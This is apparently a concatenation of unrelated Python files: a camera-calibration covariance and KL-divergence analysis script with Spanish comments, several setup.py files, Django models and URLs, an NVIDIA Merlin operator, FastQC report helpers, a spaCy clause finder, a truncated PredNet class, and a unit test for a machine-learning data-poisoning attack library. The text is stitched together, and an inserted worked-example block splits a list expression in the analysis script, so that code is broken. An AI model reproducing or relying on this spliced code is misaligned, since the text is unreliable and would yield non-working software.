= ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum xTeo[imSel] = [xm, ym] xMC[imSel] = muM Cteo[imSel] = Cm Cmc[imSel] = CmNum # # mahalanobis distance # xDif = np.array([xM - xm, yM - ym]).transpose((2,1,0)) # Sm = np.linalg.inv(Cm) # precision matrix # SmNum = np.linalg.inv(CmNum) ## mahDist = (xDif.reshape((nPt,N,2,1)) * ## Sm.reshape((nPt,1,2,2)) * ## xDif.reshape((nPt,N,1,2)) ## ).sum(axis=(2,3)) # # matrix determiants square root # Cm = Cm.T # detTeo = Cm[0, 0] * Cm[1, 1] - Cm[0, 1] * Cm[1, 0] # CmNum = CmNum.T # detMC = CmNum[0, 0] * CmNum[1, 1] - CmNum[0, 1] * CmNum[1, 0] # # # likelihood (no 2pi yet) ## lik[imSel] = np.exp(- mahDist / 2) / detsSqrt.reshape((-1,1)) # np.log() #lik /= 2 * np.pi # remaining normalising factor #likelihood = np.exp(np.sum(np.log(lik), axis=2)) difX = np.transpose(xMC - xTeo, (0,2,1)) Steo = np.linalg.inv(Cteo) # las inversas Smc = np.linalg.inv(Cmc) CteoT = np.transpose(Cteo, (2, 3, 0, 1)) CmcT = np.transpose(Cmc, (2, 3, 0, 1)) detTeo = CteoT[0, 0] * CteoT[1, 1] - CteoT[0, 1] * CteoT[1, 0] detMC = CmcT[0, 0] * CmcT[1, 1] - CmcT[0, 1] * CmcT[1, 0] # logaritmo de determinantes logDets = np.log(detTeo / detMC) # aprovechoq ue son simetricas traceC1C2 = np.sum(Steo * Cmc, axis=(2,3)) # mahalanobis mah = (difX.reshape((nIm,nPt,2,1)) * Smc * difX.reshape((nIm,nPt,1,2))).sum(axis=(2,3)) #mah2 = np.zeros_like(mah) #for i in range(nIm): # for j in range(nPt): # mah2[i,j] = difX[i,j].dot(Smc[i,j]).dot(difX[i,j]) #np.allclose(mah,mah2) ''' formula de la divergencia KL para dos gaussianas. fuente: https://stats.stackexchange.com/questions/60680/kl-divergence-between-two-multivariate-gaussians#60699 https://www.math.uwaterloo.ca/~hwolkowi//matrixcookbook.pdf ''' KL = (logDets - 2 + traceC1C2 + mah) / 2 KLmean = np.mean(KL) KLmedian = np.median(KL) plt.hist(KL.reshape(-1),30) plt.title('histograma de divergencias KL') plt.xlabel('divergencia KL') plt.text(0.0015, 150, 'media: %1.2e\nmoda: %1.2e'%(KLmean, KLmedian)) # %% pruebo de poner todo sobre una elipse normalizada a circulo # las elipses de montecarlo: TallMC = cl.unit2CovTransf(Cmc.reshape((-1,2,2))) ellMC = np.dot(TallMC, cl.Xcirc) + difX.reshape((-1,2,1)) # para llevar las elipses teoricas al circulo unitario: CteoUnit2Cov = np.linalg.inv(cl.unit2CovTransf(Cteo.reshape((-1,2,2)))) ellMCunitario = (CteoUnit2Cov.reshape((-1,2,2,1)) * ellMC.reshape((-1,1,2,cl.Xcirc.shape[1])) ).sum(axis=2) # %% plt.figure() for ell in ellMCunitario: plt.plot(ell[0], ell[1], '-b', alpha=0.1, lw=1.0) plt.plot(cl.Xcirc[0], cl.Xcirc[1], '-r') plt.axis('equal') plt.xlabel('transformed Xm') plt.ylabel('transformed Ym') plt.savefig("/home/sebalander/Dropbox/Vision/2018internationalPaper/" + "figs/ellipsesNormalised.png") # %% # %% # calculo las normas de frobenius de cada matriz y de la diferencia CiF, CdF, ChF, CmF = [ln.norm(C, axis=(1,2)) for C in [Ci, Cd, Ch, Cm]] CiNF, CdNF, ChNF, CmNF = [ln.norm(C, axis=(1,2)) for C in [CiNum, CdNum, ChNum, CmNum]] CiDF, CdDF, ChDF, CmDF = [ln.norm(C, axis=(1,2)) for C in [Ci - CiNum, Cd - CdNum, Ch - ChNum, Cm - CmNum]] li, ld, lh, lm = np.empty((4,npts,3), dtype=float) liN, ldN, lhN, lmN = np.empty((4,npts,3), dtype=float) # %% def sacoValsAng(C): npts = C.shape[0] L = np.empty((npts, 3), dtype=float) # calculo valores singulares y angulo for i in range(npts): l, v = ln.eig(C[i]) L[i] = [np.sqrt(l[0].real), np.sqrt(l[1].real), np.arctan(v[0, 1] / v[0, 0])] return L Li, Ld, Lh, Lm = [sacoValsAng(C) for C in [Ci, 
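# ----------------------------------------------------------------------
# Hedged aside (worked example, not part of the original analysis). The KL
# divergence computed above uses the closed form for two Gaussians
# N0 = (mu0, S0) and N1 = (mu1, S1) in k dimensions:
#   KL(N0 || N1) = 0.5 * ( tr(S1^-1 S0) + (mu1 - mu0)^T S1^-1 (mu1 - mu0)
#                          - k + ln(det S1 / det S0) )
# Small self-contained check with two hand-picked 2x2 covariances.
def kl_gaussians(mu0, S0, mu1, S1):
    k = mu0.shape[0]
    S1inv = np.linalg.inv(S1)
    d = mu1 - mu0
    return 0.5 * (np.trace(S1inv @ S0) + d @ S1inv @ d - k
                  + np.log(np.linalg.det(S1) / np.linalg.det(S0)))

mu0 = np.array([0.0, 0.0]); S0 = np.array([[2.0, 1.0], [1.0, 3.0]])
mu1 = np.array([0.1, -0.2]); S1 = np.array([[2.2, 0.9], [0.9, 2.8]])
print("KL(N0||N1) =", kl_gaussians(mu0, S0, mu1, S1))  # 0 only for identical Gaussians
# ----------------------------------------------------------------------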
Cd, Ch, Cm]] LiN, LdN, LhN, LmN = [sacoValsAng(C) for C in [CiNum, CdNum, ChNum, CmNum]] # %% "indicadores" de covarianza # radio desde centro optico rads = ln.norm(imgPts - cameraMatrix[:2, 2], axis=1) tVm = cl.rotateRodrigues(rtV[3:],-rtV[:3]) # traslation vector in maps frame of ref factorVista = ln.norm(chessboardModel[0].T + tVm.reshape(-1,1), axis=0) / tVm[2] # %% grafico las normas de las covarianzas # radios respecto al centro de distorsion ''' ver que la diferencia entre las covarianzas depende del radio y esta diferencia puede atribuirse a la nolinealidad de distorsion porque tiene una curva parecida 1- meter los 54 ptos de todas las imagenes a ver si siguen la misma tendencia 2- analizar por separado la covarianza numerica y la teorica y la diferencia es muy loco que la dependencia en el radio parece volver a difuminarse al hacer el ultimo paso del mapeo. ''' plt.figure() plt.subplot(221) plt.scatter(rads, CiF) plt.scatter(rads, CiNF) plt.subplot(222) plt.scatter(rads, CdF) plt.scatter(rads, CdNF) plt.subplot(223) plt.scatter(rads, ChF) plt.scatter(rads, ChNF) plt.subplot(224) plt.scatter(rads, CmF) plt.scatter(rads, CmNF) # %% rads = factorVista plt.figure() var = 0 plt.subplot(341) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(342) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(343) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(344) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) var = 1 plt.subplot(345) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(346) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(347) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(348) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) var = 2 plt.subplot(349) plt.scatter(rads, Li[:, var]) plt.scatter(rads, LiN[:, var]) plt.subplot(3,4,10) plt.scatter(rads, Ld[:, var]) plt.scatter(rads, LdN[:, var]) plt.subplot(3,4,11) plt.scatter(rads, Lh[:, var]) plt.scatter(rads, LhN[:, var]) plt.subplot(3,4,12) plt.scatter(rads, Lm[:, var]) plt.scatter(rads, LmN[:, var]) # %% plt.figure() var = 0 plt.subplot(341) plt.scatter(Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], [np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(342) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(343) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(344) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') var = 1 plt.subplot(345) plt.scatter(Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], [np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(346) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(347) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(348) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') var = 2 plt.subplot(349) plt.scatter(rads, Li[:, var], LiN[:, var]) plt.plot([np.min(Li[:, var]), np.max(Li[:, var])], 
[np.min(LiN[:, var]), np.max(LiN[:, var])], '-k') plt.subplot(3,4,10) plt.scatter(Ld[:, var], LdN[:, var]) plt.plot([np.min(Ld[:, var]), np.max(Ld[:, var])], [np.min(LdN[:, var]), np.max(LdN[:, var])], '-k') plt.subplot(3,4,11) plt.scatter(Lh[:, var], LhN[:, var]) plt.plot([np.min(Lh[:, var]), np.max(Lh[:, var])], [np.min(LhN[:, var]), np.max(LhN[:, var])], '-k') plt.subplot(3,4,12) plt.scatter(Lm[:, var], LmN[:, var]) plt.plot([np.min(Lm[:, var]), np.max(Lm[:, var])], [np.min(LmN[:, var]), np.max(LmN[:, var])], '-k') # %% saco de todos los puntos las desvests y angulo L = list() LN = list() Rads = list() N = 5000 # cantidad de puntos MC Ci = (1.0**2) * np.array([np.eye(2)]*nPt) / 1 for imSel in range(nIm): print('\t imagen', imSel) fkV = intrCalib['inMean'] cameraMatrix, distCoeffs = flat2int(fkV, Ns, model) rtV = intrCalib['exMean'][imSel] imgPts = imagePoints[imSel, 0] Cintr = intrCalib['inCov'] / 1 covLim0 = 6 * imSel covLim1 = covLim0 + 6 Crt = intrCalib['exCov'][covLim0:covLim1,covLim0:covLim1] / 1 retAll = analyticVsMC(imgPts, Ci, cameraMatrix, distCoeffs, Cintr, rtV, Crt) ptsTeo, ptsNum, covTeo, covNum, ptsMC = retAll [xd, yd], [xh, yh], [xm, ym] = ptsTeo Ci, Cd, Ch, Cm = covTeo xI, xD, yD, xH, yH, xM, yM = ptsMC muI, muD, muH, muM = ptsNum CiNum, CdNum, ChNum, CmNum = covNum L.append(sacoValsAng(covTeo[3])) LN.append(sacoValsAng(covNum[3])) Rads.append(ln.norm(imagePoints, axis=1)) # %% for i in range(len(L)): for j in range(3): plt.subplot(2,3,j+1) plt.scatter(L[i][:,j], LN[i][:,j]) plt.subplot(2,3,j+4) plt.scatter(Rads[i], L[i][:,j]) plt.scatter(Rads[i], LN[i][:,j]) for j in range(2): plt.subplot(2,3,j+1) plt.plot([0, 0.5], [0, 0.5], 'k-') plt.subplot(2,3,3) plt.plot([-1, 1], [-1, 1], 'k-') # %% from scipy.special import chdtri def ptosAdentro(x, y, muX, muY, C, p): ''' calcular la cantidad de puntos que caen adentro para una dada probablidad ''' # calculo ma raiz cuadrada de C. 
tal que A.dot(A.T) = C l, v = ln.eig(ln.inv(C)) A = np.sqrt(l.real) * v # llevo los vectores a la forma linealizada X = np.array([x - muX, y - muY]).T.dot(A) # radio^2 para 2D y probabiliad p de que esten adentro r2 = chdtri(2, 1 - p) adentro = np.sum(ln.norm(X, axis=1) <= np.sqrt(r2)) / x.shape[0] return adentro i = 9 ptosAdentro(xI[:, i, 0], xI[:, i, 1], imagePoints[i, 0], imagePoints[i, 1], Ci[i], 0.7) # x, y, muX, muY, C, p = (xI[:, 9, 0], xI[:, 9, 1], imagePoints[9, 0], imagePoints[9, 1], Ci[0], 0.7) ptosAdentro(xM[:, i], yM[:, i], xm[i], ym[i], Cm[i], 0.7) # %% saco la norma de frobenius de todas y comparo N = 1000 # cantidad de realizaciones imSel = 30 # ELIJO UNA DE LAS IMAGENES covSuperList = list() for imSel in range(0, 33, 4): print(imSel) rtV = intrCalib['exMean'][imSel] imgPts = imagePoints[imSel,0] covLim0 = 6 * imSel covLim1 = covLim0 + 6 Crt = intrCalib['exCov'][covLim0:covLim1,covLim0:covLim1] Dextr = cl.unit2CovTransf(Crt) npts = imgPts.shape[0] retAll = analyticVsMC(imgPts, Ci, cameraMatrix, Cf, distCoeffs, Ck, Cfk, rtV, Crt, retPts=False) # covTeo, covNum = retAll # Ci, Cd, Ch, Cm = covTeo # CiNum, CdNum, ChNum, CmNum = covNum covSuperList.append(retAll) ''' los indices de la supermatriz: (a,b,c,d,e) a: imagen seleccionada b: 0 para teorico, 1 par anumerico c: imagen, disotrted, homogeneus, world d: los puntos en una imagen e, f: son los 2 indices de la covarianza ''' covsTeo, covsNum = np.array(covSuperList).transpose((1, 2, 0, 3, 4, 5)).reshape((2, 4, -1, 2, 2)) scaleNum = np.linalg.inv(covsNum) # saco la norma de frobenius de cada matriz covSuperFrob = np.linalg.norm(covSuperList, axis=(4, 5)) # %% p = 2 matt = np.eye(p) np.exp(-p/2) / spe.gamma(N/2) / 2**(N*p/2) / np.linalg.det(matt)**(p/2+0.5) sts.wishart.pdf(matt, df=N-1, scale=matt) # %% rv = sts.wishart() rv.pdf() frobQuotList = (covSuperFrob[:, 0] / covSuperFrob[:,1]).transpose((1, 0, 2)).reshape((4, -1)) plt.plot(frobQuotList) plt.hist(frobQuotList[3]) plt.violinplot(frobQuotList.T, showmeans=True, showextrema=False) setup.py from setuptools import setup, find_packages import sys, os version = '1.2.0' setup( name='ckanext-scheming', version=version, description="Easy, sharable custom CKAN schemas", long_description=""" This CKAN extension provides a way to configure and share metadata schemas using a YAML or JSON schema description. Custom validation and template snippets for editing and display are supported. 
Originally developed for the Government of Canada's custom metadata schema, part of https://github.com/open-data/ckanext-canada """, classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers keywords='', author='', author_email='', url='https://github.com/ckan/ckanext-scheming', license='MIT', packages=find_packages(exclude=['ez_setup', 'examples', 'tests']), namespace_packages=['ckanext'], include_package_data=True, zip_safe=False, install_requires=[], entry_points=\ """ [ckan.plugins] scheming_datasets=ckanext.scheming.plugins:SchemingDatasetsPlugin scheming_groups=ckanext.scheming.plugins:SchemingGroupsPlugin scheming_organizations=ckanext.scheming.plugins:SchemingOrganizationsPlugin scheming_test_subclass=ckanext.scheming.tests.plugins:SchemingTestSubclass scheming_test_plugin=ckanext.scheming.tests.plugins:SchemingTestSchemaPlugin itranslation=ckanext.itranslation.plugin:ExampleITranslationPlugin [babel.extractors] ckan = ckan.lib.extract:extract_ckan [paste.paster_command] scheming=ckanext.scheming.commands:SchemingCommand """, message_extractors={ 'ckanext': [ ('**.py', 'python', None), ('**.js', 'javascript', None), ('**/templates/**.html', 'ckan', None), ], } ) 1-10 # MIT License # # Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the # Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
from __future__ import absolute_import, division, print_function, unicode_literals import logging import numpy as np import pytest from art.attacks.poisoning import BullseyePolytopeAttackPyTorch from tests.utils import ARTTestException logger = logging.getLogger(__name__) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_poison(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) attack = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2) poison_data, poison_labels = attack.poison(x_train[5:10], y_train[5:10]) np.testing.assert_equal(poison_data.shape, x_train[5:10].shape) np.testing.assert_equal(poison_labels.shape, y_train[5:10].shape) with pytest.raises(AssertionError): np.testing.assert_equal(poison_data, x_train[5:10]) except ARTTestException as e: art_warning(e) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_poison_multiple_layers(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) num_layers = len(classifier.layer_names) attack = BullseyePolytopeAttackPyTorch(classifier, target, [num_layers - 2, num_layers - 3]) poison_data, poison_labels = attack.poison(x_train[5:10], y_train[5:10]) np.testing.assert_equal(poison_data.shape, x_train[5:10].shape) np.testing.assert_equal(poison_labels.shape, y_train[5:10].shape) with pytest.raises(AssertionError): np.testing.assert_equal(poison_data, x_train[5:10]) except ARTTestException as e: art_warning(e) @pytest.mark.skip_framework("non_dl_frameworks", "tensorflow", "mxnet", "keras", "kerastf") def test_failure_modes(art_warning, get_default_mnist_subset, image_dl_estimator): try: (x_train, y_train), (_, _) = get_default_mnist_subset classifier, _ = image_dl_estimator(functional=True) target = np.expand_dims(x_train[3], 0) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, learning_rate=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, max_iter=-1) with pytest.raises(TypeError): _ = BullseyePolytopeAttackPyTorch(classifier, target, 2.5) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, opt="new optimizer") with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, momentum=1.2) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, decay_iter=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, epsilon=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, dropout=2) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, net_repeat=-1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, -1) with pytest.raises(ValueError): _ = BullseyePolytopeAttackPyTorch(classifier, target, len(classifier.layer_names) - 2, decay_coeff=2) except 
ARTTestException as e: art_warning(e) apps/courses/models.py import datetime from django.db import models from django.conf import settings from django.contrib.auth.models import Group, User from django.utils.translation import ugettext as _ from djangotoolbox import fields from tinymce import models as tinymce_models import recurrence.fields from libs.utils.fields import ForeignKey class Semester(models.Model): name = models.CharField(max_length = 200) year = models.IntegerField() start = models.DateField() end = models.DateField() def active(self): return self.start < datetime.date.today() and self.end > datetime.date.today() def save(self, *args, **kwargs): if self.start > self.end: raise ValueError, "Start date must be before end date." return super(Semester, self).save(*args, **kwargs) def __unicode__(self): return "%s %s" % (self.name, self.year) class Course(models.Model): title = models.CharField(max_length = 200) section = models.CharField(max_length = 10) number = models.CharField(max_length = 10) description = tinymce_models.HTMLField() semester = models.ForeignKey(Semester) faculty = fields.ListField(ForeignKey(User, related_name = _('Faculty'))) teaching_assistants = fields.ListField(ForeignKey(User, related_name = _('Teaching Assistants'))) private = models.BooleanField(default=False, blank=True) members = fields.ListField(ForeignKey(User, related_name = _('Members'))) schedule = recurrence.fields.RecurrenceField() credits = models.DecimalField(max_digits = 3, decimal_places = 1, default = '3.0') campus = models.CharField(max_length = 200, choices = getattr(settings, 'CAMPUSES', [('main', 'Main'),] ), ) location = models.CharField(max_length = 200) def __unicode__(self): return "%s" % (self.title) class Admin: js = ( 'tiny_mce/tiny_mce.js', '/appmedia/admin/js/textareas.js', ), class Assignment(models.Model): course = models.ForeignKey(Course) title = models.CharField(max_length = 200) description = tinymce_models.HTMLField() due_date = models.DateField(null = True) def __unicode__(self): return unicode(self.title) class AssignmentSubmission(models.Model): users = fields.ListField(ForeignKey(User, related_name = 'submitters')) assignment = models.ForeignKey(Assignment) link = models.URLField(blank = True) file = models.FileField(upload_to = 'photos/%Y/%m/%d', blank = True) notes = models.TextField(blank = True) submitted = models.DateTimeField(auto_now_add = True) modified = models.DateTimeField(auto_now_add = True, auto_now = True) def __unicode__(self): if self.link: return self.link elif self.file: return self.file.name class Resource(models.Model): course = models.ForeignKey(Course) title = models.CharField(max_length = 200) description = tinymce_models.HTMLField() link = models.URLField(blank = True) file = models.FileField(upload_to = 'photos/%Y/%m/%d', blank = True) def __unicode__(self): return self.title NVIDIA-Merlin/systems0 # # Copyright (c) 2022, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# import pathlib from typing import List from merlin.dag import ColumnSelector from merlin.schema import Schema from merlin.systems.dag.ops.operator import InferenceOperator from merlin.systems.triton.export import _generate_nvtabular_config class TransformWorkflow(InferenceOperator): """ This operator takes a workflow and turns it into a ensemble operator so that we can execute feature engineering during ensemble on tritonserver. """ def __init__( self, workflow, sparse_max: dict = None, max_batch_size: int = None, label_columns: List[str] = None, model_framework: str = None, cats: List[str] = None, conts: List[str] = None, ): """ Creates a Transform Workflow operator for a target workflow. Parameters ---------- workflow : Nvtabular.Workflow The workflow to transform data in ensemble. sparse_max : dict, optional Dictionary representing key(name)/val(max value) pairs of max sparsity, by default None max_batch_size : int, optional Maximum batch size, by default None label_columns : List[str], optional List of strings identifying the label columns, by default None model_framework : str, optional String representing the target framework (supported: hugectr, tensorflow, pytorch, python), by default None cats : List[str], optional List of strings identifying categorical columns, by default None conts : List[str], optional List of string identifying continuous columns, by default None """ super().__init__() self.workflow = workflow self.sparse_max = sparse_max or {} self.max_batch_size = max_batch_size self.label_columns = label_columns or [] self.model_framework = model_framework or "" self.cats = cats or [] self.conts = conts or [] super().__init__() def compute_output_schema( self, input_schema: Schema, col_selector: ColumnSelector, prev_output_schema: Schema = None ) -> Schema: return self.workflow.output_schema def export(self, path, input_schema, output_schema, node_id=None, version=1): """Create a directory inside supplied path based on our export name""" modified_workflow = self.workflow.remove_inputs(self.label_columns) node_name = f"{node_id}_{self.export_name}" if node_id is not None else self.export_name node_export_path = pathlib.Path(path) / node_name node_export_path.mkdir(parents=True, exist_ok=True) workflow_export_path = node_export_path / str(version) / "workflow" modified_workflow.save(str(workflow_export_path)) return _generate_nvtabular_config( modified_workflow, node_name, node_export_path, backend="nvtabular", sparse_max=self.sparse_max, max_batch_size=self.max_batch_size, cats=self.cats, conts=self.conts, ) Tarpelite/YourLegend from django.urls import path from django.conf.urls import url from . import views app_name = "TextWeb" urlpatterns = [ path('Choice/', views.Choice, name='Choice'), url(r'^$', views.predict_based_time, name='Answer') ]src/utils.py ''' A program to summarize FastQC data. Author: (). Copyright: 2016 See README.md for details about how to use the program. Repository: https://github.com/khalidm/fastqcsum ''' import os import sys def getHtmlHeader(): html_str = """ FastQC Summary

<table>
<tr>
<th>File</th>
<th>Basic Statistics</th>
<th>Per base sequence quality</th>
<th>Per tile sequence quality</th>
<th>Per sequence quality scores</th>
<th>Per base sequence content</th>
<th>Per sequence GC content</th>
<th>Per base N content</th>
<th>Sequence Length Distribution</th>
<th>Sequence Duplication Levels</th>
<th>Overrepresented sequences</th>
<th>Adapter Content</th>
<th>Kmer Content</th>
</tr>
"""
    return html_str


def getHtmlHeader2(path):
    html_str = """FastQC Summary
<h1>FastQC summary</h1>
"""
    html_str += """
<p>source directory: """
    html_str += path
    html_str += """</p>
"""
    html_str += """
<table>
<tr>
<th>File</th>
<th>Basic Statistics</th>
<th>Per base sequence quality</th>
<th>Per tile sequence quality</th>
<th>Per sequence quality scores</th>
<th>Per base sequence content</th>
<th>Per sequence GC content</th>
<th>Per base N content</th>
<th>Sequence Length Distribution</th>
<th>Sequence Duplication Levels</th>
<th>Overrepresented sequences</th>
<th>Adapter Content</th>
<th>Kmer Content</th>
</tr>
""" return html_str def getImageName(module): '''Build a string to match module name and image file name''' im = "" im_ex = False if module == "Basic Statistics": im_ex = False im = "" elif module == "Per base sequence quality": im = "per_base_quality.png" im_ex = True elif module == "Per tile sequence quality": im = "per_tile_quality.png" im_ex = True elif module == "Per sequence quality scores": im = "per_sequence_quality.png" im_ex = True elif module == "Per base sequence content": im = "per_base_sequence_content.png" im_ex = True elif module == "Per sequence GC content": im = "per_sequence_gc_content.png" im_ex = True elif module == "Per base N content": im = "per_base_n_content.png" im_ex = True elif module == "Sequence Length Distribution": im = "sequence_length_distribution.png" im_ex = True elif module == "Sequence Duplication Levels": im = "duplication_levels.png" im_ex = True elif module == "Overrepresented sequences": im = "" im_ex = False elif module == "Adapter Content": im = "adapter_content.png" im_ex = True elif module == "Kmer Content": im = "kmer_profiles.png" im_ex = True else: im = "" im_ex = False return im, im_ex def fibMemo(): pad = {0:0, 1:1} def func(n): if n not in pad: pad[n] = func(n-1) + func(n-2) return pad[n] return func fm = fibMemo() for i in range(1,31): print(fm(i), end=' ') setup.py from setuptools import setup, find_packages setup( name='gym_d2d', version='0.0.3', description='Device-to-Device (D2D) communication OpenAI Gym environment', keywords='open ai gym environment rl agent d2d cellular offload resource allocation', url='https://github.com/davidcotton/gym-d2d', long_description=open('README.md').read(), long_description_content_type='text/markdown', packages=find_packages(where='src'), package_dir={'': 'src'}, install_requires=['gym>=0.9.6', 'numpy'], extras_require={ 'dev': ['flake8', 'pytest', 'pytest-cov', 'pytest-sugar'] }, clasifiers=[ 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', ], ) import click import spacy language_model = "en_core_web_trf" nlp = spacy.load(language_model) def find_root_of_sentence(doc): root_token = None for token in doc: if token.dep_ == "ROOT": root_token = token return root_token def find_other_verbs(doc, root_token): other_verbs = [] for token in doc: ancestors = list(token.ancestors) if token.pos_ == "VERB" and len(ancestors) == 1 and ancestors[0] == root_token: other_verbs.append(token) return other_verbs def get_clause_token_span_for_verb(verb, doc, all_verbs): first_token_index = len(doc) last_token_index = 0 this_verb_children = list(verb.children) for child in this_verb_children: if child not in all_verbs: if child.i < first_token_index: first_token_index = child.i if child.i > last_token_index: last_token_index = child.i return first_token_index, last_token_index @click.command() @click.option('--text', help='Input sentence') def click_find_main_clause(text): ret_val = find_main_clause(text) print(ret_val) def find_main_clause(text): doc = nlp(text) root_token = find_root_of_sentence(doc) other_verbs = find_other_verbs(doc, root_token) token_spans = [] all_verbs = [root_token] + other_verbs for other_verb in all_verbs: (first_token_index, last_token_index) = \ get_clause_token_span_for_verb(other_verb, doc, all_verbs) token_spans.append((first_token_index, last_token_index)) sentence_clauses = [] for token_span in token_spans: start = token_span[0] end = 
token_span[1] if start < end: clause = doc[start:end] sentence_clauses.append(clause) sentence_clauses = sorted(sentence_clauses, key=lambda tup: tup[0]) clauses_text = [clause.text for clause in sentence_clauses] return clauses_text[0] if __name__ == '__main__': click_find_main_clause() yumaloop/predwm0 import os import tensorflow as tf import tensorflow.contrib.layers as ly import numpy as np seed = 42 np.random.seed(seed) tf.set_random_seed(seed) def add_upscale(X): prev_shape = X.get_shape() size = [2 * int(s) for s in prev_shape[1:3]] return tf.image.resize_nearest_neighbor(X, size) class PredNet(): def __init__(self, batch_size, time_step, layer_loss_weights=np.array([1., 0, 0, 0], np.float32) , img_shape=(128, 160, 3), stack_sizes=(3, 48, 96, 192), R_stack_sizes=(3, 48, 96, 192), A_filter_sizes=(3, 3 ,3), Ahat_filter_sizes=(3, 3, 3, 3), R_filter_sizes=(3, 3, 3, 3), pixel_max=1, output_mode='all', extrap_start_time=None): self.batch_size = batch_size self.time_step = time_step self.layer_loss_weights = layer_loss_weights self.img_shape = img_shape self.stack_sizes = stack_sizes self.nb_layers = len(stack_sizes) self.R_stack_sizes = R_stack_sizes self.A_filter_sizes = A_filter_sizes self.Ahat_filter_sizes = Ahat_filter_sizes self.R_filter_sizes = R_filter_sizes self.pixel_max = pixel_max self.output_mode = output_mode default_output_mode = ['predition', 'error', 'all'] layer_output_mode = [layer + str(n) for n in range(self.nb_layers) for layer in ['R', 'E', 'A', 'Ahat']] if self.output_mode in default_output_mode: self.output_layer_type = self.output_mode[:-1] self.output_layer_num = int(self.output_mode[-1]) else: self.output_layer_type = None self.output_layer_num 